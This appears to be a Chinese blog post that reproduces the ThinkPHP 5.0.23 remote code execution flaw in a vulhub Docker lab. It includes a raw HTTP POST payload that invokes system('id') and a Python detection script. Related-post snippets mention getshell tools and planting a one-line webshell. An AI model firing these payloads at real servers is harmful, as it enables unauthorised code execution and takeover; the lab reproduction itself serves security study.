Python武器库开发-武器库篇之ThinkPHP 5.0.23-RCE 漏洞复现(六十四)

于 2024-06-23 19:07:57 发布
阅读量1k 收藏 18
点赞数 12
分类专栏: Python武器库开发 文章标签: python 开发语言 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_64973687/article/details/139903440
版权

Python武器库开发-武器库篇之ThinkPHP 5.0.23-RCE 漏洞复现(六十四)

漏洞环境搭建

这里我们使用Kali虚拟机安装docker并搭建vulhub靶场来进行ThinkPHP漏洞环境的安装,我们进入 ThinkPHP漏洞环境,可以 cd ThinkPHP,然后通过 ls 查看可以搭建的靶场,目前 vulhub关于 ThinkPHP漏洞。可以搭建的靶场有五个。我们拿 5.0.23-rce 漏洞举例,如果我们想要安装 5.0.23-rce 漏洞环境,可以 cd 到 5.0.23-rce ,然后输入以下命令启动靶场环境:

docker-compose up -d

在这里插入图片描述

然后我们在浏览器输入 https://localhost:8081就可以访问靶场环境

在这里插入图片描述

ThinkPHP5.0.23-RCE漏洞原理

ThinkPHP5.0.23-RCE漏洞是一种远程代码执行漏洞,存在于ThinkPHP框架的5.0.23版本及之前的版本中。该漏洞的原理是在TP5的路由解析过程中,由于未对用户输入进行足够的过滤,导致恶意用户可以构造特定的URL请求来执行任意的PHP代码。

具体来说,漏洞的原理如下:

  1. 在TP5中,路由解析过程中会将URL中的参数进行解析,并根据解析结果调用相应的控制器方法。

  2. 在解析URL参数时,TP5通过分析URL中的冒号(:)和斜杠(/)来确定控制器和方法的名称。

  3. 由于未对用户输入进行足够的过滤,恶意用户可以通过在URL中注入特定的代码来构造恶意请求。

  4. 恶意用户可以通过在URL中使用特殊字符(如冒号和斜杠)来改变URL参数的解析结果,从而执行任意的PHP代码。

  5. 当恶意用户构造的恶意请求被TP5解析时,解析结果可能会将恶意代码作为控制器或方法的名称,导致恶意代码被执行。

通过利用这个漏洞,攻击者可以执行任意的PHP代码,包括但不限于删除、修改、上传文件等恶意操作,进而对系统进行攻击或者获取系统敏感信息。

其POC如下所示:
url:/index.php?s=captcha
_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=id

ThinkPHP 5.0.23-RCE漏洞POC

接下来我们给出ThinkPHP 5.0.23-RCE漏洞的POC,代码内容如下:

POST /index.php?s=captcha HTTP/1.1
Host: host:8081
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.110 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 72

_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=id

我们通过BP抓包发送数据,得到相应的回显。

在这里插入图片描述

ThinkPHP 5.0.23-RCE漏洞POC编写

现在我们用python编写检测ThinkPHP 5.0.23-RCE漏洞的代码,内容如下:

#!/usr/bin/env python

import requests
from urllib.parse import urljoin
# from bs4 import BeautifulSoup

def thinkphp_5023_rce(url):
    # url = url+'/index.php?s=captcha'
    # print(url)
    # payload = r'_method=__construct&filter[]=phpinfo&method=get&server[REQUEST_METHOD]=1'
    # headers = {
    #     'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0',
    #     'Content-Type': 'application/x-www-form-urlencoded',
    #   }
    payload = {
        '_method':'__construct',
        'filter[]':'phpinfo',
        'method':'get',
        'server[REQUEST_METHOD]':'1'
    }
    
    target = urljoin(url,'/index.php?s=captcha')
    # print(target)
    response = requests.post(target,data=payload,verify=False)
    print(response.text)
    if 'PHP Version' in response.text:
        print("漏洞存在")
    else:
        print("漏洞不存在")
        
if __name__ == '__main__':
    url = 'http://localhost:8081'
    thinkphp_5023_rce(url)

POC代码详细分析

这段代码是一个用于检测ThinkPHP 5.0.23版本远程代码执行漏洞的脚本。下面是对代码的分析:

  1. 导入requests模块和urllib.parse模块的urljoin函数。
  2. 定义了一个名为thinkphp_5023_rce的函数,接受一个参数url作为目标网站的URL。
  3. 构造了一个payload字典,包含了需要发送的POST请求的参数。
  4. 使用urljoin函数将目标网站的URL与特定的路径拼接成新的URL。
  5. 使用requests.post发送POST请求,将目标URL和payload作为参数,设置verify为False表示不验证SSL证书。
  6. 打印响应的文本内容。
  7. 判断响应的文本内容中是否包含"PHP Version",如果包含则表示漏洞存在,否则表示漏洞不存在。
  8. 在主函数中指定目标网站的URL,并调用thinkphp_5023_rce函数。

该代码是一个简单的脚本,用于检测ThinkPHP 5.0.23版本存在的远程代码执行漏洞。它发送一个POST请求并检查响应的文本内容中是否包含特定的关键字来确定漏洞是否存在。

运行效果图

如下是我们这串代码的实际运行效果图:

在这里插入图片描述

怰月
关注
  • 12
    点赞
  • 18
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
thinkphp python_python3编写ThinkPHP命令执行Getshell的方法
weixin_31885875的博客
12-23 203
加了三个验证漏洞以及四个getshell方法# /usr/bin/env python3# -*- coding: utf-8 -*-# @Author: Morker# @Email: [email]admin@nsf.me[/email]# @Blog: [url]http://nsf.me/[/url]import requestsimport sysdef demo():print(' ...
ThinkPHP 5.0.0_5.0.23 RCE 漏洞分析1
08-03
ThinkPHP 5.0.0_5.0.23 RCE 漏洞分析 ThinkPHP 是一个流行的 PHP 框架,它提供了许多实用的功能来帮助开发者快速构建 Web 应用程序。然而,在 ThinkPHP 5.0.0 到 5.0.23 版本中存在一个 Remote Code Execution(RCE...
ThinkPHP5.0.0~5.0.23RCE 漏洞分析及挖掘思路
shelter1234567的博客
01-16 1659
本节我将分析thinkphp5.0.x 版本的RCE漏洞,根据漏洞的研究模拟挖掘此漏洞的思路
ThinkPHP5.0.0~5.0.23路由控制不严谨导致的RCE
最新发布
shelter1234567的博客
01-22 1176
本次我们继续以漏洞挖掘者的视角,来分析thinkphpRCE
thinkphp 调用python脚本
12-22 656
header("Content-type: text/html; charset=utf-8"); exec("python ./demo2.py 20141010",$array,$ret); dump($array); foreach ($array as $a){ dump($a); } #coding:utf-8 print ("ok"); print("错误");
thinkphp python_thinkphp5+python.apscheduler实现计划任务
weixin_36430300的博客
12-23 135
1.thinkphp5配置自定义命令行/application/console/commandnamespace app\console\command;use think\console\Command;use think\console\Input;use think\console\input\Argument;use think\console\input\Option;use think...
thinkphp python_ThinkPhp 5.0 服务器搭建问题总结
weixin_39904268的博客
12-23 115
前言本文主要用来总结使用ThinkPhp 5.0 在搭建服务器中遇到的问题,持续更新。1、数据库导入mysql文件新建一个编码为utf-8的数据库CREATE DATABASE `test` DEFAULT CHARACTER SET utf8 COLLATE utf8_general_ci;导入数据库将指定目录下的sql文件导入到test数据库中******为数据库密码mysql -uroot ...
thinkphp python_ThinkPHP中U方法的详解(支持简单路由)
weixin_39557813的博客
01-30 119
ThinkPHP中U方法的详解(支持简单路由)分类:PHP_Python| 发布:佚名| 查看: | 发表时间:2014/8/5thinkPHP中U方法的定义规则如下(方括号内参数根据实际应用决定):U('[项目://][路由@][分组名-模块/]操作? 参数1=值1[&参数N=值N]')或者用数组的方式传入参数:U('[项目://][路由@][分组名-模块/]操作',array('参数1...
thinkphp python_PHP中ThinkPHP的高级查询
weixin_30872577的博客
02-11 118
我们在提到ThinkPHP框架的时候,之所以推荐大家使用,还是因为其综合性的功能比较强。除了支持一些普通的操作,在查询上也有一些高级的方法。本为大家带来的是快捷查询和区间查询。两种方法的详细介绍和具体实例用法都在下方展示了出来,我们一起看看查询的方法吧。1.快捷查询快捷查询方式是一种多字段相同查询条件的简化写法,可以进一步简化查询条件的写法,在多个字段之间用 | 分割表示OR查询,用 &...
ThinkPHP3.2.x RCE漏洞通报1
08-03
ThinkPHP3.2.x RCE漏洞通报】中提到的安全问题涉及到ThinkPHP 3.2版本的一个严重远程代码执行漏洞。这个漏洞源于框架中的`assign`方法,该方法用于将变量传递给模板进行渲染。当攻击者能够控制`assign`方法的第一...
python3编写ThinkPHP命令执行Getshell的方法
09-19
主要介绍了python3编写ThinkPHP命令执行Getshell的方法,小编觉得挺不错的,现在分享给大家,也给大家做个参考。一起跟随小编过来看看吧
PHP漏洞利用工具
02-11
PHP漏洞利用工具
ThinkPHP v5.0.23 核心版
10-05
ThinkPHP v5.0.23核心版详解》 ThinkPHP,作为一款深受开发者喜爱的PHP框架,自诞生以来,以其简洁、高效的特性在PHP社区中占据了一席之地。尤其是ThinkPHP v5.0系列,它在继承了ThinkPHP框架一贯的优势之外,...
fast-think:高效、快速的thinkphp开发工具
05-29
fast-think简介fast-think是基于thinkphp封装的,用于快速高效的进行业务开发的模式,包含了自定义的command命令、自定义查询构造器,文档生成器等等。仅仅需要一条MySQL建表语句,代码、注释支持一键自动生成,接口...
ThinkPHP如何调用python脚本
王嘟嘟的博客
10-04 3517
0x00 前言 由于对python脚本的依赖,所以我们可能需要在框架里进行使用python代码 0x01 start 1. 首先建一个文件夹用来存放python脚本 2.python脚本的内容 print "123" print "4" print "5" 3.php代码调用 header("content-type:text/html;charset=utf-8"); ...
thinkphp5 rce
weixin_51558394的博客
08-17 447
thinkphp5 rce
thinkphp5RCE
weixin_45778886的博客
03-07 1672
这里写目录标题加载第三方类库captcha路由。非debugpayload:1.路由检测1.1跟进self::routeCheck1.2跟进Route::check1.2.1在check函数进入$request->method(),1.2.2进入method()函数1.2.3进入__construct函数1.3跟进self::checkRoute1.4 跟进self::checkRule1.5跟进self::parseRule2.路由检测后,进入self::exec函数2.1 跟进exec函数2.2R
thinkphp5.0.23rce漏洞复现
09-22
ThinkPHP 5.0.23版本之前存在一个远程代码执行(RCE)的漏洞漏洞的形成原因是在获取method的方法中未正确处理方法名,导致攻击者可以调用Request类的任意方法并构造利用链,从而导致远程代码执行漏洞。具体的漏洞利用过程如下: 1. 访问靶机地址和端口号,进入首页。 2. 使用Burp抓包工具修改传参方式为POST,传入参数为"_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=pwd",其中pwd是系统执行命令的参数。 3. 接着进行漏洞复现过程,首先在Kali docker容器中启动此漏洞环境。 4. 使用浏览器访问Kali的IP地址接上8080端口。 5. 再次使用Burp抓包工具,修改传参方式为POST,URL后接入/index.php?s=captch,传入参数为"_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=pwd"。 6. 点击Burp中的Go按钮,尝试写入phpinfo。 7. 成功后,写入一句话木马,密码为aaa。 8. 进一步操作,可以上蚁剑。 漏洞复现成功后,您可以参考这文章了解更多细节:[https://www.cnblogs.com/zenb/p/14537240.html](https://www.cnblogs.com/zenb/p/14537240.html)。如果您对此漏洞有更多疑问,欢迎提出。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

怰月

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值